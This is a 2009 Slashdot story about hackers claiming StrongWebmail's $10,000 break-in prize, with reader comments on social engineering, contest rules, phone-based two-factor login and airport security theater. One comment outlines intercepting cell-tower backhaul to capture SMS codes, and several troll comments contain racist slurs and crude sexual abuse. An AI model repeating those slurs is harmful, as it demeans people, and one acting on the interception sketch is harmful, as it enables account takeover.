Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Hackers Claim $10K Prize For StrongWebmail Breakin

Soulskill posted more than 5 years ago | from the worth-their-while dept.

Security 193

alphadogg writes "Telesign, a provider of voice-based authentication software, challenged hackers to break into its StrongWebmail.com Web site late last week. The prize: $10,000. On Thursday, a group of security researchers claimed to have won the contest, which challenged hackers to break into the Web mail account of StrongWebmail CEO Darren Berkovitz and report back details from his June 26 calendar entry. The hackers, led by Secure Science Chief Scientist Lance James and security researchers Aviv Raff and Mike Bailey, provided details from Berkovitz's calendar to IDG News Service. In an interview, Berkovitz confirmed those details were from his account. However, Berkovitz could not confirm that the hackers had actually won the prize. He said he would need to check to confirm that the hackers had abided by the contest rules, adding, 'if someone did it, we'll kind of put our heads down.'"

cancel ×

193 comments

Sorry! There are no comments related to the filter you selected.

Hu? (5, Insightful)

ae1294 (1547521) | more than 5 years ago | (#28229477)

Wait I'm confused??? They expected the hackers to follow rules?

Re:Hu? (4, Interesting)

Allicorn (175921) | more than 5 years ago | (#28229599)

I'm thinking - if the hackers actually bribed/tricked the CEO's PA into just telling them what what in the calendar record then the guy is going to try to weasel out of paying.

As soon as you embed Linux in your ass let us know (-1, Troll)

bigblacknigger (1440657) | more than 5 years ago | (#28229637)

Make sure that it runs bash, vi, iptables, SSHd, Squid, Apache, MySQL and KDE, otherwise it doesn't count.

Re:As soon as you embed Linux in your ass let us k (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28229773)

Shut up you fucking nigger. KDE? Looks and acts like shit, just like you. It's the GUI embodiment of geeks who dont get any pussy.

"Hey, let's make things as needlessly ugly and needlessly complicated as possible!"

If you're going to be needlessly ugly then at least be a nigger - at least you'll have a footlong cock. Otherwise just shut the fuck up.

Recent versions of KDE are the result of a bunch of virgins getting together to decide the best way to get laid. Go GNIGGER. Go GNOME.

Re:As soon as you embed Linux in your ass let us k (-1, Troll)

gavron (1300111) | more than 5 years ago | (#28229803)

Bill Gates, stop drinking, take your meds, and quit posting on slashdot. You're not even trolling like anyone who can innovate. *LOL*

E

Re:Hu? (1)

Ethanol-fueled (1125189) | more than 5 years ago | (#28229691)

What parent may or may not imply is that it was an inside job with lots of external obfuscation.

Re:Hu? (5, Insightful)

MrMista_B (891430) | more than 5 years ago | (#28229729)

Social engineering is an perfectly valid and entirely effective method of hacking.

Re:Hu? (4, Insightful)

XanC (644172) | more than 5 years ago | (#28229775)

But it doesn't test their software.

Re:Hu? (4, Interesting)

ta bu shi da yu (687699) | more than 5 years ago | (#28229867)

Uh? According to NetworkWorld, "the IDG attack did not work initially, but succeeded when security software called NoScript was disabled on the Firefox browser, running on a Windows XP machine." wtf?

Re:Hu? (0)

Anonymous Coward | more than 5 years ago | (#28230091)

Wait, that sounds like it was a client-side attack on the CEO's machine. That also fails to test their email service.

Re:Hu? (1)

Jah-Wren Ryel (80510) | more than 5 years ago | (#28230495)

Wait, that sounds like it was a client-side attack on the CEO's machine. That also fails to test their email service.

Sounds like cross-site scripting to me. And if it can be done to the CEO to give other's access to his account, then it can also be done to any other user and their account too. If the company doesn't take precautions against that form of exploit then they are vulnerable and ultimately the bad guys don't give a shit about how they get access, they just care about getting access.

Re:Hu? (3, Insightful)

Allicorn (175921) | more than 5 years ago | (#28230033)

That wasn't the whole challenge. The challenge was to access an account on their allegedly super-secure webmail service. If the software is fairly solid but the staff are easily duped/bribed... how secure is the service?

Even if social engineering alone resulted in getting access to the prize data, then the challenge has still been met: StrongWebmail.com - the service - is not secure.

Re:Hu? (0)

XanC (644172) | more than 5 years ago | (#28230135)

Well, suppose they bribed or tricked the CEO's secretary. She has the CEO's email password, not because she works for StrongWebmail.com, but because she's his secretary.

That kind of attack has nothing to do with the service, since she wouldn't have everybody else's password too. And it would work against pretty much any (gullible or corrupt) secretary, regardless of the system or security.

Re:Hu? (4, Insightful)

C18H27NO3 (1282172) | more than 5 years ago | (#28229847)

agreed.
In the real world I'm not going to care HOW my secret correspondence was hacked when they assured me it would never happen.
"They got in through a vulnerability in our OS, but our software held up".
"Someone in our company helped themselves/someone else to your mails, but our software held up".
"Someone installed a trojan that compromised the authentication system, but our software held up".

I understand perfectly what they are trying to achieve with this contest but they come off as sounding as if any other means of obtaining 'secure' information is beyond their liability when they state that it is the most secure webmail system out there.
There are many different levels to security that need to be continually addressed yet they seem to think that as long as their little solo phone app doesn't get compromised then it's not really their fault.
At least that's the way the rules and TFA sound.

Re:Hu? (5, Informative)

jesseck (942036) | more than 5 years ago | (#28229831)

While I agree that social engineering is a very legit way to hack a system, the terms of the challenge ( link here [strongwebmail.com] state that "You may not work with an employee, partner, or owner of StrongWebmail.com or any of its affiliates or partners to accomplish the email hack." Since this was StrongWebmail's contest, they make the rules. Even if the rules prevent a common method of hacking from taking place. On the other hand, people are quite often the weak link... by preventing the contestants from using this "easy" entry point (say, a janitor or secretary), they can test the technical system itself.

Re:Hu? (1)

C18H27NO3 (1282172) | more than 5 years ago | (#28229949)

"You may not work with an employee, partner, or owner of StrongWebmail.com or any of its affiliates or partners..." I interpret that as colluding or conspiring with them is forbidden when in fact social engineering would technically be 'working against them'.

Re:Hu? (1)

GumphMaster (772693) | more than 5 years ago | (#28230643)

Am I alone in thinking that: "work with an employee..." != "dupe an employee"?

If these guys managed to get in by conning an unknowing employee then they can hardly be claimed to have been working together. They are no more working together than the way a con-man "works with" their victim. It's largely moot anyway, which employee is going to say, "Hey boss, I let them have the information."? Severely career limiting methinks.

Re:Hu? (3, Informative)

capnkr (1153623) | more than 5 years ago | (#28230069)

FTFA (page 2, first paragraph):

James said that these contests might be fun, but they don't provide a realistic measure of real security because they are encumbered with rules. The StrongWebmail contest prohibits working with a company insider, for example.

Re:Hu? (3, Insightful)

Tubal-Cain (1289912) | more than 5 years ago | (#28229623)

I could understand if they don't want to pay up to someone that hacked something other than their software. Exploiting a Window bug may count if they are not cross-platform may count, but bribing the janitor probably doesn't. Yes, a real cracker may hack one of this product's customers that way, but Telesign couldn't be at fault for that.

Re:Hu? (1)

iamhassi (659463) | more than 5 years ago | (#28229739)

"Exploiting a Window bug may count if they are not cross-platform may count, but bribing the janitor probably doesn't."

The hell it doesn't! If hackers can pay the janitor or other employee a few bucks to access the CEO's email then I wanna know that before I hand StrongWebmail $$$ to handle my email. That's like saying social engineering [wikipedia.org] doesn't count. Of course it counts, the end results were the same, right?

Re:Hu? (4, Interesting)

Tubal-Cain (1289912) | more than 5 years ago | (#28230157)

The hell it doesn't! If hackers can pay the janitor or other employee a few bucks to access the CEO's email then I wanna know that before I hand StrongWebmail $$$ to handle my email.

That depends on what they are providing. If they are providing a hosting service of some sort, then bribing a janitor counts. If they are providing a system to be handled by the local network admins (that's the impression I get), then it shouldn't. The janitors there are not the janitors that will be around the customers servers.

Re:Hu? (3, Insightful)

nine-times (778537) | more than 5 years ago | (#28230007)

Why shouldn't bribing a janitor count? If I'm paying someone to call me every time I want to log into my email, then I'm probably pretty paranoid about security and don't want other people gaining access to my email. If security is so bad that random employees (including the janitor) can read my email, and those employees are so untrustworthy that they can be easily bribed, then that's just as real of a security problem as if their software were flawed.

Security is often only as strong as its weakest point. If the point of this prize was to prove that your email is secure on their servers, then gaining unauthorized access to other people's email on their servers should be enough to claim the prize.

Re:Hu? (1)

Tubal-Cain (1289912) | more than 5 years ago | (#28230209)

I got the impression this is meant to be a locally-administered system rather than a remote one. I would have a hard time blaming Microsoft for a social engineering-based security breach of a MS Exchange setup, though I would not hesitate to lampoon them for such a breach at Hotmail.

Re:Hu? (2, Informative)

innocent_white_lamb (151825) | more than 5 years ago | (#28230325)

Your impression is wrong. I just looked at their website. They're offering a webmail service like Yahoo or Gmail -- the difference is that they phone you with an access code at a pre-determined phone number every time you want to access your email account.

Re:Hu? (1)

maxwells_deamon (221474) | more than 5 years ago | (#28229787)

I suspect and hope that the statement was just a way to delay until the person in charge of the contest (some committee perhaps) officially confirms the win so that the check can be written.

that said, if you set something like this up with no rules you are being quite dumb.

for instance you can not violate law, don't ambush employees in the parking lot with weapons. Don't physically break into the building, don't download the employee database...

Re:Hu? (3, Insightful)

ae1294 (1547521) | more than 5 years ago | (#28229839)

Honestly what I find extremely funny is that they already know they have a security problem and that these hackers have some sort of access.

Are they really going to try and piss them off and not pay up?

Rules? (0, Redundant)

Anonymous Coward | more than 5 years ago | (#28229485)

Rules? LOL.. Ok just as long as all hackers abide by the rules I'm sure all our information is safe :)

Telegraphing (4, Insightful)

inviolet (797804) | more than 5 years ago | (#28229491)

The size of the prize -- $10,000 -- indicates that the company thought it reasonably possible that they'd get hacked, and/or desired to avoid motivating any serious hacking attempt. Neither explanation gives me much confidence in their product.

And wow did it ever backfire. Normally they do these kinds of promotions in the hopes that nobody will bother, so that the company can later say "We offered a wheelbarrow of cash, and still nobody hacked us!". As if that was equivalent to a real security audit.

Re:Telegraphing (5, Insightful)

Alethes (533985) | more than 5 years ago | (#28229525)

Maybe I'm naive, but I figure StrongWebmail.com might be the best webmail site to use for security right now because they're in a heightened state of alert. Kinda like flying after right after 9/11.

Re:Telegraphing (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#28229633)

Maybe I'm naive, ...

Yes. You are naive.

Re:Telegraphing (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28229863)

Dickhead.

Re:Telegraphing (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28229991)

Technically, a dickhead will have a much bigger penis than you or me can ever dream of.

On top of that, he will have a tounge on the dick, thus allowing penetration and licking of the clit at the same time.

Thus a dickhead can provide a woman with levels of pleasure far above anything we can come up with.

Re:Telegraphing (3, Insightful)

gavron (1300111) | more than 5 years ago | (#28229641)

There was nothing done after 9/11 to raise the level of security for the flying public. That includes the period right after 9/11 up to and including today. Everything that was done was in the spirit of "security theater" (credit: Bruce Schneier).

Strongmail isn't the "best" (whatever criteria you use for "best") webmail site for "security" (whatever your definition of "security"). It's proven that it's easily cracked, and that is in and of itself a stay-away sign.

I highly recommend Bruce's blog at http://www.schneier.com/blog/ [schneier.com] .

E

Re:Telegraphing (1, Insightful)

Moridineas (213502) | more than 5 years ago | (#28229687)

There was nothing done after 9/11 to raise the level of security for the flying public. That includes the period right after 9/11 up to and including today. Everything that was done was in the spirit of "security theater" (credit: Bruce Schneier).

That is such incredible BS. Disregarding the heightened awareness of airport personnel and stricter rules for metal detection, body pat downs, and newer equipment, what about air marshals? You can't possibly be claim that under cover air marshals are "security theater."

Yeah, some of it is no doubt security theater, that's not in dispute...who says security theater isn't effective?

Re:Telegraphing (3, Insightful)

gavron (1300111) | more than 5 years ago | (#28229733)

"Heightened awareness" of untrained personnel yield more chaos and more chaffe, not more data. Sorry.

Body pat downs are security theater. The 9/11 terrorists didn't have boxcutters on them nor would that have been found in a pat down.

Newer equipment has only been installed in test markets to do the "puff" test. It detects gunpowder or explosive residue. Neither the "liquid explosive" (myth) nor the boxcutters can be detected by it.

Under-cover air-marshals board first, and keep their jackets on. IF THEY WERE ADEQUATELY TRAINED, NOT CORRUPT (see many news stories to the contrary) then they might make a difference but not for any real scenarios.

You forgot to mention "reinforced cockpit doors" and "not congregating at the toilet." These also, like the former, do not prevent a terrorist with a boxcutter from putting it to the throat of a flight attendant (and four of them doing so to all four flight attendants) and threatening to kill them all.

Before you argue whether such an attack would be successful -- consider this -- if they can do it (which they can) then security since 9/11 has not increased which is exactly what I said.

"Who says security theater isn't effective?"

It's effective as mediocre entertainment if someone you don't like has to go through it.

It's not effective as security.

Best regards

E

Re:Telegraphing (2, Insightful)

michaelhood (667393) | more than 5 years ago | (#28230001)

You started to touch one the one thing that has changed that matters, IMO. And that's largely a policy change.

We used to operate under the assumption that would-be hijackers wanted political attention and/or money. Now we operate under the assumption they are willing to die if it means inflicting more casualties. This means we will never again open the [now reinforced] cockpit doors in any circumstances when there is a hostile scenario in the cabin.

So all of this talk about box-cutters and other mythical impromptu melee weapons is a false dilemma. This is no longer a viable threat. Virtually all threats to be considered at this point are ones capable of causing harm to a large number of passengers in the passenger cabin (firearms), or causing the plane to crash (explosives). There are of course fringe cases, but all things must be a balance of convenience/accessibility and security.

Re:Telegraphing (2, Insightful)

gavron (1300111) | more than 5 years ago | (#28230047)

That's a red herring. Today's pilots don't know whether the terrorist of tomorrow wants to use the plane as a weapon (as did the one occurrence in 2001) or whether they have other goals they wish to accomplish. These same N terrorists (pick a number -- the lack of security won't prevent ten boxcutters from being brought on board any more than they'd not prevent 4 being brought on board) can threaten a LARGE number of innocent women, children, and men.

Pilots will likely respond and land the plane. Sure, it won't be used as a weapon (but that was the 8-year-old plan... not tomorrow's plan). They can still get hundreds of hostages.

Going back to my original point. THERE IS NO MORE SECURITY TODAY. The Pilots' attitude is not a result of heightened security nor better screeners, nor the creation of DHS nor anything else.

Again, the web site does not provide stronger security. The airlines do not provide stronger security. There is equal lack of realism in saying "I'd rather fly now than before 2001" as "I'd rather trust strongwebmail now rather than before they were hacked." Neither has improved their security.

E

Re:Telegraphing (0)

capnkr (1153623) | more than 5 years ago | (#28230121)

Wrong. There IS more security today. Lots of it - just go to an airport and look.

Security [thefreedictionary.com] definition. Check 3(b).

That said - the efficaciousness of said can be brought into doubt, but the fact that there is more of it (or at least, an attempt at such) cannot.

No matter how much you believe to the contrary. Sorry, but you might want to put more thought into how you are phrasing/making your argument. This is a tough crowd. ;)

Re:Telegraphing (1)

gavron (1300111) | more than 5 years ago | (#28230149)

Thanks for the definition. It confirms there's no more security. There's just the appearance of same.

See my post (granparent's parent) on "Security theater."

It has nothing to do with beliefs. Security is a fact, or in this case a fact of nonexistence.

"This is a tough crowd"

Work harder to convince them then.

The facts speak for themselves.

It's now Friday night. Have a good one. Try not to be confused by the appearance of something vs the real thing.

E

Re:Telegraphing (1)

capnkr (1153623) | more than 5 years ago | (#28230309)

I'm not confused or tricked in the least - quite the contrary, in fact.

Parse the 'security' definition a little further and/or with more care; in particular, pay attention to the use of the word "assure", as opposed to "ensure", which, based on how you are arguing this point, seems to be your expectation of what is implicit in the term and/or idea of 'security'.

Security (3) reads: "Something that gives or assures safety,"

The first half of Assure [thefreedictionary.com] defined states:

1. To inform positively, as to remove doubt. 2. To cause to feel sure. 3. To give confidence to; reassure.

I do understand the point you are trying to make, and why. In fact, we are likely largely in agreement. I am simply pointing out that the statements you are making are overbroad and general, and that you could make them more effective in order to get the point across.

Have a good Friday evening yourself. :)

Re:Telegraphing (0, Flamebait)

Jah-Wren Ryel (80510) | more than 5 years ago | (#28230507)

Wrong. There IS more security today. Lots of it - just go to an airport and look.

Security definition. Check 3(b).

Wooo-hoo! Dictionary flame! You are kicking ass in this fight!
Semantic dickweed for the win!

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230131)

That policy change happened before the day was out, even - as evidenced by a field in Pennsylvania. An airliner in the US will never be hijacked again.

Re:Telegraphing (3, Insightful)

gavron (1300111) | more than 5 years ago | (#28230169)

"An airliner in the US will never be hijacked again."

Sadly, sir, you are incorrect.

E

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230199)

Do you honestly think a planeful of people are going to let someone take over the controls, regardless of what weapon he might have?

That's not happening - it simply won't. They'd have to kill everyone on the plane.

Re:Telegraphing (1)

gavron (1300111) | more than 5 years ago | (#28230223)

No, they'd kill one flight attendant, then grab another one by the neck and ask "Who wants to come up and be next."

All the little wanna be heroes would remain seated.

thanks for the question. Off to enjoy my weekend. There are no terrorists nor fake would-be security in my weekend.

Best regards,

E

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230263)

Just out of curiosity, have you ever been in a situation that involved the use of deadly force?

Re:Telegraphing (4, Informative)

Anonymous Coward | more than 5 years ago | (#28229901)

You think awareness will help to any degree? Awareness of what and how is that equal greater security? I worked at a major airline before and about 5 months after 9/11. I worked at an airline and at an airport that was used by the 9/11 terrorists. Things may have seem to have changed but if you knew anything about the operations at an airport, it was smoke and mirrors. Maybe have things have changed since then so I can not comment.

On another note, I now live and work in DC. I see cars being checked before pulling into parking garages of important buildings. A security guard walks around the car with a mirror on a stick and checks the underneath of the cars before allowing entry. You call that increased security? Paint your bomb with undercoating or put it in the truck, in your engine bay, or hell, even in the back seat. As long as it does not have flashing lights and does not say "EXPLOSIVE" on it, they would never know.

You want to know what heightened awareness there is? Remeber this incident? http://en.wikipedia.org/wiki/2007_Boston_Mooninite_Scare [wikipedia.org]
It had lights and wires, it must be a bomb. You feel save with that level of awareness? I don't.

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230123)

I was on a flight last night, actually, and looked over to see a fire extinguisher behind the last row of seats.

I can't take nail clippers on the plane (because I might hijack it!), but its okay to leave a fire extinguisher sitting there. Ever see someone sprayed with a fire extinguisher?

If America was a truly free country still, 9/11 would have ended with a bunch of terrorists with gunshot wounds.

Re:Telegraphing (1)

Mad Merlin (837387) | more than 5 years ago | (#28230139)

Yeah, some of it is no doubt security theater, that's not in dispute...who says security theater isn't effective?

Security theater is worse than no security at all.

Re:Telegraphing (1)

bitt3n (941736) | more than 5 years ago | (#28229975)

Maybe I'm naive, but I figure StrongWebmail.com might be the best webmail site to use for security right now because they're in a heightened state of alert. Kinda like flying after right after 9/11.

I'm building a webmail service packed with so many sql injection opportunities that it gets hacked by accident, just so you can put your mind at ease.

Re:Telegraphing (0)

Anonymous Coward | more than 5 years ago | (#28230341)

Bahaha, this ain't no amusement park ride kid

Re:Telegraphing (1)

Foodie (980694) | more than 5 years ago | (#28229759)

$10,000 is not a bad price to pay for that much publicity. Too bad they got hacked in such a short amount of time.

Re:Telegraphing (4, Funny)

bitt3n (941736) | more than 5 years ago | (#28229969)

The size of the prize -- $10,000 -- indicates that the company thought it reasonably possible that they'd get hacked, and/or desired to avoid motivating any serious hacking attempt. Neither explanation gives me much confidence in their product.

And wow did it ever backfire. Normally they do these kinds of promotions in the hopes that nobody will bother, so that the company can later say "We offered a wheelbarrow of cash, and still nobody hacked us!". As if that was equivalent to a real security audit.

Perhaps they'll fix their software by simply offering a lower prize.

"Hack our software, and win a free small soda with purchase of any McDonald's value meal!"

Re:Telegraphing (1)

capnkr (1153623) | more than 5 years ago | (#28230129)

+1 Funny. :)

Interesting approach (3, Insightful)

l2718 (514756) | more than 5 years ago | (#28229541)

Offering bounties is a great approach to finding bugs in your code. The crackers are taking quite a legal risk, however -- what if the owner of the computer decided that they "exceeded the hacking authorization"?

Re:Interesting approach (4, Insightful)

The MAZZTer (911996) | more than 5 years ago | (#28229559)

As long as they followed the rules, in theory they could probably defend themselves quite well in court considering the whole thing with the prize money and the offer. It's a bit hard to claim that someone illegally hacked into your system when a) you invited anyone to hack it and b) you laid out rules WHICH THEY FOLLOWED.

Put the Vi.agr.a team on it!!! (0)

Anonymous Coward | more than 5 years ago | (#28229553)

They'll break it. Guaranteed. Or your money back.

This is obvious (5, Insightful)

empesey (207806) | more than 5 years ago | (#28229577)

If they idea is to determine whether it can be cracked, why are there rules? Whether they followed some self-imposed rules or not, it still indicates that there is a weak link in the armor.

Re:This is obvious (1, Funny)

Anonymous Coward | more than 5 years ago | (#28229745)

, it still indicates that there is a weak link in the armor.

That's not the preferred nomenclature. Asian-american, please.

Re:This is obvious (1, Informative)

Anonymous Coward | more than 5 years ago | (#28229985)

This joke wasn't immediately apparent to me. If it isn't to anybody else, then my advice to them is to try to imagine synonyms for "weak link" as it applies to armour.

Re:This is obvious (0)

Anonymous Coward | more than 5 years ago | (#28230409)

You found the chink in my armor!

The Catch (5, Informative)

LSDelirious (1569065) | more than 5 years ago | (#28229613)

from StrongWebmail's Site [strongwebmail.com]

There's just one catch: to access a StrongWebmail.com email account, the account's owner must receive a verification call on his pre-registered phone number. So even though you have our CEO's username and password, you still have some work to do because you don't have access to his telephone. If you do manage to be the first person to break into his email account, there's $10,000 in it for you - just register below to get started. Good luck!

So they have to hack the phone company's system too, or find a way to clone his cellphone, so they can intercept the call and approve access? They might be cool with having their own systems hacked, but it sounds like they are now involving a phone company, which might not be too thrilled to be a part of their little game - the only way around that I can see is to hack the StrongWebmail system to change the "pre-registered" phone number....

and who the hell wants an email account you have to approve via phone call every time you login?!? What if your phone is lost/broken/dead/no reception/etc.. then you have no way in

Re:The Catch (2, Funny)

Tubal-Cain (1289912) | more than 5 years ago | (#28229649)

Telesign, a provider of voice-based authentication software...

Sounds like something for protecting a phone system.

Re:The Catch (3, Funny)

michaelhood (667393) | more than 5 years ago | (#28230015)

My voice is my passport; verify me.

Full Details (0)

LSDelirious (1569065) | more than 5 years ago | (#28229651)

here: Official Contest Rules, Terms, and Conditions

Re:Full Details (5, Informative)

LSDelirious (1569065) | more than 5 years ago | (#28229675)

Re:Full Details - or 'Contest can not be won' (1)

daryl_and_daryl (1005065) | more than 5 years ago | (#28230569)

You can not use a computer, telephone, or any tool of any type.
From the rules:

"Detailed information about how you accomplished the hack - we must be able to reproduce the hack by reading your explanation"

So if you did anything more than read an explanation - you have not followed the rules.

Re:Full Details - or 'Seriously you can not win' (1)

daryl_and_daryl (1005065) | more than 5 years ago | (#28230669)

Again the rule :
Detailed information about how you accomplished the hack - we must be able to reproduce the hack by reading your explanation

StrongWebmail Hacking Method use in contest

1. Reset the Entire StrongWebmail system to condition to that of 02 June 2009 @ 14:00:00 UTC
2. Call (XXX) YYY- ZZZZ on 02 June 2009 @ 14:00:30 UTC
3 Ask for Bob and follow his instructions ( where Bob is not someone excluded from the contest )

They could never do that, but they also can not show that it would fail.
Do I get the prize or not ?

Re:The Catch (3, Insightful)

Gi0 (773404) | more than 5 years ago | (#28229653)

If i could hack the phone company's system, or find a way to clone their CEO cellphone,besides hacking their system,would i be willing to let them know for just 10 grant?Nop.That knowledge has got to be more precious.

Re:The Catch (2, Insightful)

Jaime2 (824950) | more than 5 years ago | (#28229753)

Or hack the authentication system so that it thinks you already went through all that stuff when all you did was forge an authentication proof. Their system is very resistant to some types of attacks, like password guessing. But, it is no stronger than a normal username and password against most attacks on the system itself. SrongWebmail.com's biggest mistake was thinking that they knew of all of their weaknesses.

Blackjacking's been around for awhile (2, Informative)

sgt_doom (655561) | more than 5 years ago | (#28229805)

Hacking (or blackjacking, to use the vernacular) cells has been in existence for quite awhile, with probably Thai coders taking the lead, with Chinese, Americans, Germans and Brits coming up from the rear.....

Re:Blackjacking's been around for awhile (4, Funny)

grcumb (781340) | more than 5 years ago | (#28229987)

Hacking (or blackjacking, to use the vernacular) cells has been in existence for quite awhile, with probably Thai coders taking the lead, with Chinese, Americans, Germans and Brits coming up from the rear.....

That must be uncomfortable for the Thais...

... What? Oh! 'Coming up from the rear.' Forget I said anything.

Re:The Catch (1)

mysidia (191772) | more than 5 years ago | (#28229845)

Or find a bug in the webmail system that lets them get through without access to the phone number, lets them prevent or redirect the call.

At one extreme... figure out how their system works, how it makes its outgoing calls, and one night, install some passive "taps" outside their building to capture the outgoing call when they attempt to login....

Password are bad for security. (1)

mcrbids (148650) | more than 5 years ago | (#28230597)

Passwords are a bad means of securing a computer. Sure, passwords are far cry more secure means no authentication at all, but they do have some pretty severe limitations...

1) Any breach of a password pretty much kills them. Dead. If your ex-GF/BF gets the password to your webmail account, god help you, because the password in their hands works just as well as in yours.

2) Usually you don't have any (obvious) way of knowing that the breach occurred.

3) Because of (1) and (2), they are highly vulnerable to social engineering attacks: just convince somebody to give the password and it's game over. And it doesn't have to be you: it could be the system administrator, somebody at the help desk, you name it.

So they have to hack the phone company's system too, or find a way to clone his cellphone, so they can intercept the call and approve access?

Yes. That's the point, and it's a good point, too. This is a good step towards improving security, and I've toyed with doing something similar with our web-based product. Basically, the idea goes like this:

1) End user enters login name, clicks the "next" button.

1a) (in the background, a text message is sent to user's cell phone, with a code tied to the account and to the specific login session)

2) End user enters password, clicks the "next" button.

2a) (password verified against login account)

3) End user enters code that they've received on their phone, click next

3a) (system compares login, password, session, and entered code. If they all match, user is allowed through.

In order compromise this system without actually rooting the server, the hax0r has to: know the login & password, have the cell phone or hax0rz the phone company, AND know the session code sent to the end user's browser. While not actually impossible, it's a damned sight more difficult than just a username/password!

Usually, the only way to accomplish these is to either BE the person, or steal their phone AND know their login/password. And if the phone is stolen, the rightful owner only needs to make a phone call to report it stolen, so the attack window is very small.

This is a GOOD thing folks!

Re:The Catch (5, Interesting)

digitalchinky (650880) | more than 5 years ago | (#28230847)

Damn, I wish I lived in the US. This is easy money.

For 10 grand in prize money - wow, they didn't think about this very well. The kit you need is all available on ebay for less than a grand. I already have the modems, EDT data capture cards, a couple of Sun ultra's (old, but they do the job dependably), a spectrum analyser, antennas, level converters, up/down converter, transceivers and a bunch of cables to connect it all together.

It would take a half a day at most. Camp outside his office or home, figure out which cell tower he is on (line of site) and poke an antenna in the path of the microwave link the tower uses to talk to the exchange. (This traffic is all unencrypted, bog standard T1/E1 stuff) - do whatever you need to do to trigger the text alert, suck down the CCITT-7 channel, then pick through the SMS payload until you find the code. Log in and take the cash.

Legal? I'd say absolutely, you haven't actually monitored a 'cell phone' at all, nor have you tuned your receive gear to any part of the spectrum used by a cell phone. All you've done is read the out of band signalling system on an entirely separate trunk over a link, that is not breaking the 'do not monitor phone calls' rule. (No such rules exist where I live, mostly because radio is still thought of as magic by the Government)

RULES? (0)

Anonymous Coward | more than 5 years ago | (#28229673)

one question stands out in my mind.... what WERE the rules to the contest? and was it stated they could be changed at any time?

Hate to be a pedant.... But, (1, Offtopic)

davidsyes (765062) | more than 5 years ago | (#28229695)

"break-in'", or "break-in"?

This is annoying, just as is "Logout", wich is best thought of as an act, so it should be writtein as "Log out", nnnnnnnoTTTTT, "Logout". When i see "logout" i think "oh, a PLACE". When i see "Log out", i thank the smarter site editor and imagine an act, not a place... But,that's just me...

Re:Hate to be a pedant.... But, (0)

Anonymous Coward | more than 5 years ago | (#28229715)

Huh?

Re:Hate to be a pedant.... But, (-1, Troll)

davidsyes (765062) | more than 5 years ago | (#28229807)

Oh, whoever moderated me 0, troll is just being a kessekkida/jipshekki... Try to educate some bastards, and they get all torqued out...

Re:Hate to be a pedant.... But, (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#28229897)

Well you fucking deserved it, idiot.

Re:Hate to be a pedant.... But, (1)

sdBlue (844590) | more than 5 years ago | (#28230189)

Just to pedant you back... :) Out of curiosity, what place do you think of when you see "logout"? It's so common these days, and after all, isn't "common usage" what defines the english language?

Re:Hate to be a pedant.... But, (0)

Anonymous Coward | more than 5 years ago | (#28229731)

This comment is a good vision test. ;)

Re:Hate to be a pedant.... But, (0)

Anonymous Coward | more than 5 years ago | (#28230039)

Haha, his marks. This reminds me of back in the day with some MIRC client as popular and flooding rooms with a name as a mixture of singles and doubles like "''"''''"""""""' . With the popular clients the ops would type your name into to kick you or ban you, but they couldn't type your name in because it was indecipherable, and they couldn't select your name in the namelist on the side (just because it wouldn't let you) and they couldn't select your name in the chat itself (because it was moving as you flooded). Always a good trick.

Re:Hate to be a pedant.... But, (1)

geekprime (969454) | more than 5 years ago | (#28229827)

@davidsyes

No, that's just you.

Sorry.

Re:Hate to be a pedant.... But, (1)

artor3 (1344997) | more than 5 years ago | (#28230089)

Yeah, and blackbirds are just black birds, so it should be written that way!

Or, you could learn English as its actually used, instead of pretending its a programming language.

Just Kidnap the Bastard (2, Interesting)

LSDelirious (1569065) | more than 5 years ago | (#28229703)

Just make sure Darren Berkovitz has his phone on him There's nothing in the rules against it...

Webmail can be secured. It's simple. (1)

symbolset (646467) | more than 5 years ago | (#28229857)

All you need are users who are willing to submit to invasive biometrics and can remember a few hundred pages of random one-time pad, an OS with no open ports, a data entry device that can't be subverted, a display device that projects no EMR, a single fiber from the reading device to the server protected by quantum encryption, gold shielding and armed guards for everybody involved including every developer who ever touched the code and every engineer who thought about the hardware, a whitelist both of senders and sending IP's all on a similarly secured network...

No, never mind. I don't really know how to do this. Do not use the freaking Internet for stuff that must be secure.

Re:Webmail can be secured. It's simple. (0)

Anonymous Coward | more than 5 years ago | (#28229943)

All you need are users who are willing to submit to invasive biometrics and can remember a few hundred pages of random one-time pad, an OS with no open ports, a data entry device that can't be subverted, a display device that projects no EMR, a single fiber from the reading device to the server protected by quantum encryption, gold shielding and armed guards for everybody involved including every developer who ever touched the code and every engineer who thought about the hardware, a whitelist both of senders and sending IP's all on a similarly secured network...

Get ready for a call from the Feds, because you just leaked the specs for Obama's BlackBerry!

Oh, no. (1)

symbolset (646467) | more than 5 years ago | (#28230375)

Obama's CrackBerry has even better security: it's being operated by somebody who's not stupid.

/Was that a state secret? Should I not have said that?

Wha? (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#28229861)

"last changed 4-Jun-2009"
http://toolbar.netcraft.com/site_report?url=http://www.StrongWebmail.com

RE: CEO Darren Berkovitz -- Ass Wipe (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#28229905)

What a Tweerp! Deserves all the "F@@k You" salutations from the real winners.

Point of Order... (2, Insightful)

ae1294 (1547521) | more than 5 years ago | (#28230105)

Void where prohibited, taxed, or otherwise restricted by law. Subject to all federal, state, and local laws. This Contest is open to all legal residents of the United States and the District of Columbia, and U.S. Military personnel (and their families) with APO/FPO addresses, who are eighteen (18) years of age or older.

Void where prohibited? - Hacking? Nah...
Taxed? - Hacking? - Donno it might be now...
Otherwise restricted by law? - Hacking? Nah....
Subject to all federal, state, and local laws? - Hacking? Nah...
Only open to US residents? - SURE, "all" the best hackers and US born.
18 Years of Age. - O yes, for "all" the best hackers are 18 and older because they have girlfriends, jobs and a shit-ton more to loose.

